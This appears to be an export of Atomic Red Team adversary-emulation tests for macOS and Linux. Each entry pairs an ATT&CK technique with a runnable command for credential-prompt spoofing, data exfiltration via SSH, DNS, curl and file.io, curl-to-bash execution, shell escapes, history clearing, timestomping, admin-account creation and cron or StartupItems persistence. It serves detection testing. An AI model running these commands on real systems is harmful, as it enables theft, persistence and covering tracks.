T1005
sh
macos
Copy Apple Notes database files using AppleScript
Data from Local System
This command will copy Apple Notes database files using AppleScript as seen in Atomic Stealer.
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
T1007
sh
macos
System Service Discovery - macOS launchctl
System Service Discovery
Enumerates services on macOS using launchctl. Used by adversaries for identifying daemons, background services, and persistence mechanisms.
launchctl list
T1016
sh
macos, linux
System Network Configuration Discovery
System Network Configuration Discovery
Identify network configuration information. Upon successful execution, sh will spawn multiple commands and output will be via stdout.
if [ "$(uname)" = 'FreeBSD' ]; then cmd="netstat -Sp tcp"; else cmd="netstat -ant"; fi;
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi;
if [ -x "$(command -v netstat)" ]; then $cmd | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
T1016
bash
elevated
macos
List macOS Firewall Rules
System Network Configuration Discovery
"This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows. Using defaults, additional arguments can be added to see filtered details, such as globalstate for global configuration (\"Is it on or off?\"), firewall for common application allow rules, and explicitauths for specific rules configured by the user. Using socketfilterfw, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out.
sudo defaults read /Library/Preferences/com.apple.alf
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
T1016.001
bash
macos, linux
Check internet connection using ping freebsd, linux or macos
Internet Connection Discovery
Check internet connection using ping on Linux, MACOS. The default target of the ping is 8.8.8.8 (Google Public DNS).
ping -c 4 #{ping_target}
T1018
sh
linux, macos
Remote System Discovery - arp nix
Remote System Discovery
Identify remote systems via arp. Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
arp -a | grep -v '^?'
T1018
sh
linux, macos
Remote System Discovery - sweep
Remote System Discovery
Identify remote systems via ping sweep. Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done
T1021.005
sh
elevated
macos
Enable Apple Remote Desktop Agent
VNC
ARD leverages a blend of protocols, including VNC to send the screen and control buffers and SSH for secure file transfer. Adversaries can abuse ARD to gain remote code execution and perform lateral movement. References: https://www.mandiant.com/resources/blog/leveraging-apple-remote-desktop-for-good-and-evil
sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -allowAccessFor -allUsers -privs -all -quiet
T1027
sh
macos, linux
Decode base64 Data into Script
Obfuscated Files or Information
Creates a base64-encoded data file and decodes it into an executable shell script Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that echoes Hello from the Atomic Red Team and uname -v
if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64decode -r"; else cmd="base64 -d"; fi;
cat /tmp/encoded.dat | $cmd > /tmp/art.sh
chmod +x /tmp/art.sh
/tmp/art.sh
T1027.001
sh
linux, macos
Pad Binary to Change Hash - Linux/macOS dd
Binary Padding
Uses dd to add a zero byte, high-quality random data, and low-quality random data to the binary to change the hash. Upon successful execution, dd will modify /tmp/evil-binary, therefore the expected hash will change.
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} #adds null bytes
dd if=/dev/random bs=1 count=1 >> #{file_to_pad} #adds high-quality random data
dd if=/dev/urandom bs=1 count=1 >> #{file_to_pad} #adds low-quality random data
T1027.001
sh
linux, macos
Pad Binary to Change Hash using truncate command - Linux/macOS
Binary Padding
Uses truncate to add a byte to the binary to change the hash. Upon successful execution, truncate will modify /tmp/evil-binary, therefore the expected hash will change.
truncate -s +1 #{file_to_pad} #adds a byte to the file size
T1027.002
sh
macos
Binary simply packed by UPX
Software Packing
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. No other protection/compression were applied.
cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
T1027.002
sh
macos
Binary packed by UPX, with modified headers
Software Packing
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. The UPX magic number (0x55505821, "UPX!") was changed to (0x4c4f5452, "LOTR"). This prevents the binary from being detected by some methods, and especially UPX is not able to uncompress it any more.
cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
Compile After Delivery
Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.
gcc #{input_file} && ./a.out
clang #{input_file} && ./a.out
Compile After Delivery
Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.
g++ #{input_file} && ./a.out
clang++ #{input_file} && ./a.out
Compile After Delivery
Compile a go file with golang on FreeBSD, Linux or Macos.
go run #{input_file}
T1027.013
powershell
windows, macos, linux
Decode Eicar File and Write to File
Encrypted/Encoded File
Decode the eicar value, and write it to file, for AV/EDR to try to catch.
$encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
$bytes = [System.Convert]::FromBase64String($encodedString)
$decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
#write the decoded eicar string to file
$decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt
T1027.013
powershell
windows, macos, linux
Decrypt Eicar File and Write to File
Encrypted/Encoded File
Decrypt the eicar value, and write it to file, for AV/EDR to try to catch.
$encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
$key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
$decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
$decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
#Write the decrypted eicar string to a file
$decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt
T1027.013
bash
linux, macos
Password-Protected ZIP Payload Extraction and Execution
Encrypted/Encoded File
Extracts and executes a script from a password-protected ZIP archive. This technique is commonly used by malware families like Emotet and QBot to deliver payloads via email attachments where the password is provided in the message body. The encrypted ZIP evades static file analysis until extracted at runtime. Upon successful execution, displays confirmation and system information.
echo '#!/bin/bash' > /tmp/art_payload.sh
echo 'echo "T1027.013: Payload extracted from encrypted ZIP"' >> /tmp/art_payload.sh
echo 'echo "Hostname: $(hostname)"' >> /tmp/art_payload.sh
echo 'echo "User: $(whoami)"' >> /tmp/art_payload.sh
echo 'uname -a' >> /tmp/art_payload.sh
cd /tmp && zip -P "#{zip_password}" art_encrypted.zip art_payload.sh
rm /tmp/art_payload.sh
echo "Encrypted ZIP created. Extracting with password..."
unzip -P "#{zip_password}" -o /tmp/art_encrypted.zip -d /tmp/
echo "Executing extracted payload:"
bash /tmp/art_payload.sh
T1030
sh
macos, linux
Data Transfer Size Limits
Data Transfer Size Limits
Take a file/directory, split it into 5Mb chunks
cd #{folder_path}; split -b 5000000 #{file_name}
ls -l #{folder_path}
T1033
sh
linux, macos
System Owner/User Discovery
System Owner/User Discovery
Identify System owner or users on an endpoint Upon successful execution, sh will stdout list of usernames.
users
w
who
T1036.005
sh
macos, linux
Execute a process from a directory masquerading as the current parent directory
Match Legitimate Resource Name or Location
Create and execute a process from a directory masquerading as the current parent directory (... instead of normal ..)
mkdir $HOME/...
cp $(which sh) $HOME/...
$HOME/.../sh -c "echo #{test_message}"
T1036.006
manual
macos
Space After Filename (Manual)
Space after Filename
Space After Filename
T1036.006
sh
macos, linux
Space After Filename
Space after Filename
Space after filename.
mkdir -p /tmp/atomic-test-T1036.006
cd /tmp/atomic-test-T1036.006
mkdir -p 'testdirwithspaceend '
[ "$(uname)" = 'FreeBSD' ] && /bin/echo "#\!/bin/sh" > "testdirwithspaceend /init " && echo 'echo "print(\"running T1035.006 with space after filename to masquerade init\")" | python3.9' >> "testdirwithspaceend /init " && echo "exit" >> "testdirwithspaceend /init " || /usr/bin/echo -e "%d\na\n#!/usr/bin/perl\nprint \"running T1035.006 with space after filename to masquerade init\\n\";\nqx/cp \/usr\/bin\/perl 'init '/;\nqx/'.\/init ' -e 'sleep 5'/;\n.\nwq\n" | ed 'testdirwithspaceend /init ' >/dev/null
chmod +x 'testdirwithspaceend /init '
'./testdirwithspaceend /init '
Login Hook
Mac logon script
RC Scripts
Modify rc.common [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html)
sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
T1037.005
sh
elevated
macos
Add file to Local Library StartupItems
Startup Items
Modify or create an file in /Library/StartupItems [Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware)
sudo touch /Library/StartupItems/EvilStartup.plist
T1037.005
bash
elevated
macos
Add launch script to launch daemon
Startup Items
Add launch script to /Library/StartupItems to launch agent [Example](https://cybersecurity.att.com/blogs/labs-research/diversity-in-recent-mac-malware)
sudo cp #{path_startup_params} /Library/StartupItems/StartupParameters.plist
sudo cp #{path_malicious_script} /Library/StartupItems/atomic.sh
sudo cp #{path_malicious_plist} /tmp/T1037_005_daemon.plist
sudo /Library/StartupItems/atomic.sh start
T1037.005
bash
elevated
macos
Add launch script to launch agent
Startup Items
Add launch script to /Library/StartupItems to launch agent [Example](https://cybersecurity.att.com/blogs/labs-research/diversity-in-recent-mac-malware)
sudo cp #{path_startup_params} /Library/StartupItems/StartupParameters.plist
sudo cp #{path_malicious_script} /Library/StartupItems/atomic.sh
sudo cp #{path_malicious_plist} /tmp/T1037_005_agent.plist
/Library/StartupItems/atomic.sh start
T1040
bash
elevated
macos
Packet Capture macOS using tcpdump or tshark
Network Sniffing
Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed. Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A.
sudo tcpdump -c 5 -nnni #{interface}
if [ -x "$(command -v tshark)" ]; then sudo tshark -c 5 -i #{interface}; fi;
T1040
bash
elevated
macos
Packet Capture macOS using /dev/bpfN with sudo
Network Sniffing
Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
sudo #{program_path} -i #{ifname} -t 3
T1040
bash
elevated
macos
Filtered Packet Capture macOS using /dev/bpfN with sudo
Network Sniffing
Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
sudo #{program_path} -f -i #{ifname} -t 3
T1046
bash
linux, macos
Port Scan
Network Service Discovery
Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
T1046
sh
elevated
linux, macos
Port Scan Nmap
Network Service Discovery
Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
T1046
sh
elevated
linux, macos
Port Scan using nmap (Port range)
Network Service Discovery
Scan multiple ports to check for listening ports with nmap
nmap -Pn -sV -p #{port_range} #{host}
T1048
sh
macos, linux
Exfiltration Over Alternative Protocol - SSH
Exfiltration Over Alternative Protocol
Input a domain and test Exfiltration over SSH Remote to Local Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file.
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
T1048
sh
macos, linux
Exfiltration Over Alternative Protocol - SSH
Exfiltration Over Alternative Protocol
Input a domain and test Exfiltration over SSH Local to Remote Upon successful execution, tar will compress /Users/* directory and password protect the file modification of Users.tar.gz.enc as output.
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
T1048
bash
macos, linux
Exfiltrate Data using DNS Queries via dig
Exfiltration Over Alternative Protocol
This test demonstrates how an attacker can exfiltrate sensitive information by encoding it as a subdomain (using base64 encoding) and making DNS queries via the dig command to a controlled DNS server.
dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}" | base64).google.com
T1048.002
bash
macos, linux
Exfiltrate data HTTPS using curl freebsd,linux or macos
Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Exfiltrate data HTTPS using curl to file share site file.io
curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/
T1048.003
manual
macos, linux
Exfiltration Over Alternative Protocol - HTTP
Exfiltration Over Unencrypted Non-C2 Protocol
A firewall rule (ipfw,pf,iptables or firewalld) will be needed to allow exfiltration on port 1337. Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.
T1049
bash
linux, macos
System Network Connections Discovery via ss or lsof (Linux/MacOS)
System Network Connections Discovery
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049
sh
linux, macos
System Network Connections Discovery FreeBSD, Linux & MacOS
System Network Connections Discovery
Get a listing of network connections. Upon successful execution, sh will execute netstat and who -a. Results will output via stdout.
netstat
who -a
T1053.003
sh
linux, macos
Cron - Replace crontab with referenced file
Cron
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
T1053.003
bash
elevated
macos, linux
Cron - Add script to all cron subfolders
Cron
This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
Keylogging
Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required. Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring. Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74
swift #{swift_src} -keylog
T1056.002
bash
macos
AppleScript - Prompt User for Password
GUI Input Capture
Prompt User for Password (Local Phishing) Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
T1056.002
bash
macos
AppleScript - Spoofing a credential prompt using osascript
GUI Input Capture
Prompt user for password without requiring permissions to send Apple events to System Settings. https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/
PWD_SPOOF=$(osascript -e 'display dialog "To perform a security update MacOS needs your passphrase." with title "MacOS Security Update" default answer "" with icon stop with hidden answer')
echo $PWD_SPOOF
T1057
sh
linux, macos
Process Discovery - ps
Process Discovery
Utilize ps to identify processes. Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
ps >> #{output_file}
ps aux >> #{output_file}
AppleScript
Shell Script with AppleScript. The encoded python script will perform an HTTP GET request to 127.0.0.1:80 with a session cookie of "t3VhVOs/DyCcDTFzIKanRxkvk3I=", unless 'Little Snitch' is installed, in which case it will just exit. You can use netcat to listen for the connection and verify execution, e.g. use "nc -l 80" in another terminal window before executing this test and watch for the request. Reference: https://github.com/EmpireProject/Empire
osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg=='));\\\" | python &\""
T1059.004
sh
linux, macos
Create and Execute Bash Shell Script
Unix Shell
Creates and executes a simple sh script.
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004
sh
linux, macos
Command-Line Interface
Unix Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in /tmp/art-fish.txt.
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004
sh
linux, macos
Shell Creation using awk command
Unix Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
awk 'BEGIN {system("/bin/sh &")}'
T1059.004
sh
linux, macos
Creating shell using cpan command
Unix Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
T1059.004
sh
elevated
linux, macos
emacs spawning an interactive system shell
Unix Shell
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1069.001
sh
linux, macos
Permission Groups Discovery (Local)
Local Groups
Permission Groups Discovery
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi;
if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi;
if [ -x "$(command -v id)" ]; then id; else echo "id is missing from the machine. skipping..."; fi;
if [ -x "$(command -v getent)" ]; then getent group; else echo "getent is missing from the machine. skipping..."; fi;
cat /etc/group
T1070.003
sh
linux, macos
Clear Bash history (rm)
Clear Command History
Clears bash history via rm
rm #{history_path}
T1070.003
sh
linux, macos
Clear Bash history (cat dev/null)
Clear Command History
Clears bash history via cat /dev/null
cat /dev/null > #{history_path}
T1070.003
sh
linux, macos
Clear Bash history (ln dev/null)
Clear Command History
Clears bash history via a symlink to /dev/null
ln -sf /dev/null #{history_path}
T1070.003
sh
linux, macos
Clear history of a bunch of shells
Clear Command History
Clears the history of a bunch of different shell types by setting the history size to zero
unset HISTFILE
export HISTFILESIZE=0
history -c
T1070.003
bash
linux, macos
Clear and Disable Bash History Logging
Clear Command History
Clears the history and disable bash history logging of the current shell and future shell sessions
set +o history
echo 'set +o history' >> ~/.bashrc
. ~/.bashrc
history -c
T1070.003
sh
linux, macos
Use Space Before Command to Avoid Logging to History
Clear Command History
Using a space before a command causes the command to not be logged in the Bash History file
hostname
whoami
T1070.004
sh
linux, macos
Delete a single file - FreeBSD/Linux/macOS
File Deletion
Delete a single file from the temporary directory
rm -f #{file_to_delete}
T1070.004
sh
linux, macos
Delete an entire folder - FreeBSD/Linux/macOS
File Deletion
Recursively delete the temporary directory and all files contained within it
rm -rf #{folder_to_delete}
T1070.006
sh
linux, macos
Set a file's access timestamp
Timestomp
Stomps on the access timestamp of a file
touch -a -t 197001010000.00 #{target_filename}
T1070.006
sh
linux, macos
Set a file's modification timestamp
Timestomp
Stomps on the modification timestamp of a file
touch -m -t 197001010000.00 #{target_filename}
T1070.006
sh
elevated
linux, macos
Set a file's creation timestamp
Timestomp
Stomps on the create timestamp of a file Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution.
NOW=$(date +%m%d%H%M%Y)
date 010100001971
touch #{target_filename}
date "$NOW"
stat #{target_filename}
T1070.006
sh
linux, macos
Modify file timestamps using reference file
Timestomp
Modifies the modify and access timestamps using the timestamps of a specified reference file. This technique was used by the threat actor Rocke during the compromise of Linux web servers.
touch #{target_file_path}
touch -acmr #{reference_file_path} #{target_file_path}
T1070.006
sh
macos
MacOS - Timestomp Date Modified
Timestomp
Stomps on the modification timestamp of a file using MacOS's SetFile utility
SetFile -m #{target_date} #{target_filename}
T1070.008
bash
elevated
macos
Copy and Delete Mailbox Data on macOS
Clear Mailbox Data
Copies and deletes mail data on macOS
mkdir ~/Library/Mail/copy
cp -R ~/Library/Mail/* ~/Library/Mail/copy
rm -rf ~/Library/Mail/copy/*
T1070.008
bash
elevated
macos
Copy and Modify Mailbox Data on macOS
Clear Mailbox Data
Copies and modifies mail data on macOS
mkdir ~/Library/Mail/copy
cp -R ~/Library/Mail/* ~/Library/Mail/copy
echo "Manipulated data" > ~/Library/Mail/copy/manipulated.txt
T1071.001
sh
linux, macos
Malicious User Agents - Nix
Web Protocols
This test simulates an infected host beaconing to command and control. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
curl -s -A "*<|>*" -m3 #{domain}
T1074.001
sh
linux, macos
Stage data from Discovery.sh
Local Data Staging
Utilize curl to download discovery.sh and execute a basic information gathering shell script
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > #{output_file}
T1078.001
sh
elevated
macos
Enable Guest Account on macOS
Default Accounts
This test enables the guest account on macOS using sysadminctl utility.
sudo sysadminctl -guestAccount on
T1078.003
bash
elevated
macos
Create local account with admin privileges - MacOS
Local Accounts
After execution the new account will be active and added to the Administrators group
dscl . -create /Users/AtomicUser
dscl . -create /Users/AtomicUser UserShell /bin/bash
dscl . -create /Users/AtomicUser RealName "Atomic User"
dscl . -create /Users/AtomicUser UniqueID 503
dscl . -create /Users/AtomicUser PrimaryGroupID 503
dscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser
dscl . -passwd /Users/AtomicUser mySecretPassword
dscl . -append /Groups/admin GroupMembership AtomicUser
T1078.003
bash
elevated
macos
Create local account with admin privileges using sysadminctl utility - MacOS
Local Accounts
After execution the new account will be active and added to the Administrators group
sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin
T1078.003
bash
elevated
macos
Enable root account using dsenableroot utility - MacOS
Local Accounts
After execution the current/new user will have root access
dsenableroot #current user
dsenableroot -u art-tester -p art-tester -r art-root #new user
T1078.003
bash
elevated
macos
Add a new/existing user to the admin group using dseditgroup utility - macOS
Local Accounts
After execution the current/new user will be added to the Admin group
dseditgroup -o edit -a art-user -t user admin
T1082
sh
macos
System Information Discovery
System Information Discovery
Identify System Info
system_profiler
ls -al /Applications
T1082
sh
linux, macos
List OS Information
System Information Discovery
Identify System Info
uname -a >> #{output_file}
if [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> #{output_file}; fi
if [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> #{output_file}; fi
if [ -f /etc/issue ]; then cat /etc/issue >> #{output_file}; fi
if [ -f /etc/os-release ]; then cat /etc/os-release >> #{output_file}; fi
uptime >> #{output_file}
cat #{output_file} 2>/dev/null
T1082
sh
linux, macos
Hostname Discovery
System Information Discovery
Identify system hostname for FreeBSD, Linux and macOS systems.
hostname
T1082
sh
linux, macos
Environment variables discovery on freebsd, macos and linux
System Information Discovery
Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
env
T1082
sh
macos
Show System Integrity Protection status (MacOS)
System Information Discovery
Read and Display System Intergrety Protection status. csrutil is commonly used by malware and post-exploitation tools to determine whether certain files and directories on the system are writable or not.
csrutil status
T1082
sh
macos
sysctl to gather macOS hardware info
System Information Discovery
Gets the macOS hardware information, which can be used to determine whether the target macOS host is running on a physical or virtual machine. sysctl can be used to gather interesting macOS host data, including hardware information, memory size, logical cpu information, etc.
sysctl -n hw.model
T1083
sh
linux, macos
Nix File and Directory Discovery
File and Directory Discovery
Find or discover files on the file system References: http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/ https://perishablepress.com/list-files-folders-recursively-terminal/
ls -a >> #{output_file}
if [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > #{output_file}; fi;
file */* *>> #{output_file}
cat #{output_file} 2>/dev/null
find . -type f
ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/'
locate *
which sh
T1083
sh
linux, macos
Nix File and Directory Discovery 2
File and Directory Discovery
Find or discover files on the file system
cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file}
if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi;
find . -type f -iname *.pdf >> #{output_file}
cat #{output_file}
find . -type f -name ".*"
T1087.001
sh
elevated
linux, macos
View sudoers access
Local Account
(requires root)
if [ -f /etc/sudoers ]; then sudo cat /etc/sudoers > #{output_file}; fi;
if [ -f /usr/local/etc/sudoers ]; then sudo cat /usr/local/etc/sudoers > #{output_file}; fi;
cat #{output_file}
T1087.001
sh
linux, macos
View accounts with UID 0
Local Account
View accounts with UID 0
grep 'x:0:' /etc/passwd > #{output_file}
grep '*:0:' /etc/passwd >> #{output_file}
cat #{output_file} 2>/dev/null
T1087.001
sh
linux, macos
List opened files by user
Local Account
List opened files by user
username=$(id -u -n) && lsof -u $username
T1087.001
sh
linux, macos
Enumerate users and groups
Local Account
Utilize groups and id to enumerate users and groups
groups
id
T1087.001
sh
macos
Enumerate users and groups
Local Account
Utilize local utilities to enumerate users and groups
dscl . list /Groups
dscl . list /Users
dscl . list /Users | grep -v '_'
dscacheutil -q group
dscacheutil -q user
Internal Proxy
Enable traffic redirection. Note that this test may conflict with pre-existing system configuration.
export #{proxy_scheme}_proxy=#{proxy_server}:#{proxy_port}
curl #{test_url}
T1090.001
sh
macos
Connection Proxy for macOS UI
Internal Proxy
